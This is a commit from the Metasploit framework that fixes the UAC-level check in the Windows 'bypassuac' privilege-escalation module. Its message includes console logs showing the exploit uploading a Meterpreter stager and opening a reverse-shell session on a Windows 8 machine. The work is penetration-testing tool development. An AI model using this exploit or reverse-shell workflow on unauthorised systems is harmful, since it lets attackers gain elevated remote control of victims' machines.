Fix UAC is not enabled, no reason to run module when UAC is enabled and vulnerable
The new changes when calling uac_level = open_key.query_value('ConsentPromptBehaviorAdmin') breaks UAC on Windows 7 and Windows 8 and shows that UAC is not enabled when it is: Here is prior to the change on a fully patched Windows 8 machine: msf exploit(bypassuac) > exploit [*] Started reverse handler on 172.16.21.156:4444 [*] UAC is Enabled, checking level... [-] UAC is not enabled, no reason to run module [-] Run exploit/windows/local/ask to elevate msf exploit(bypassuac) > Here's the module when running with the most recent changes that are being proposed: [*] Started reverse handler on 172.16.21.156:4444 [*] UAC is Enabled, checking level... [!] Could not determine UAC level - attempting anyways... [*] Checking admin status... [+] Part of Administrators group! Continuing... [*] Uploading the bypass UAC executable to the filesystem... [*] Meterpreter stager executable 73802 bytes long being uploaded.. [*] Uploaded the agent to the filesystem.... [*] Sending stage (770048 bytes) to 172.16.21.128 [*] Meterpreter session 6 opened (172.16.21.156:4444 -> 172.16.21.128:49394) at 2013-10-05 15:49:23 -0400 meterpreter > With the new changes and not having a return on when 0 (will not always return 0 - just in certain cases where you cannot query) - it works.bug/bundler_fix
parent
875e086d94
commit
0799766faa
|
@ -81,9 +81,7 @@ class Metasploit3 < Msf::Exploit::Local
|
|||
print_good "UAC is set to Default"
|
||||
print_good "BypassUAC can bypass this setting, continuing..."
|
||||
when 0
|
||||
print_error "UAC is not enabled, no reason to run module"
|
||||
print_error "Run exploit/windows/local/ask to elevate"
|
||||
return
|
||||
print_warning "Could not determine UAC level - attempting anyways..."
|
||||
end
|
||||
|
||||
# Check if you are an admin
|
||||
|
|
Loading…
Reference in New Issue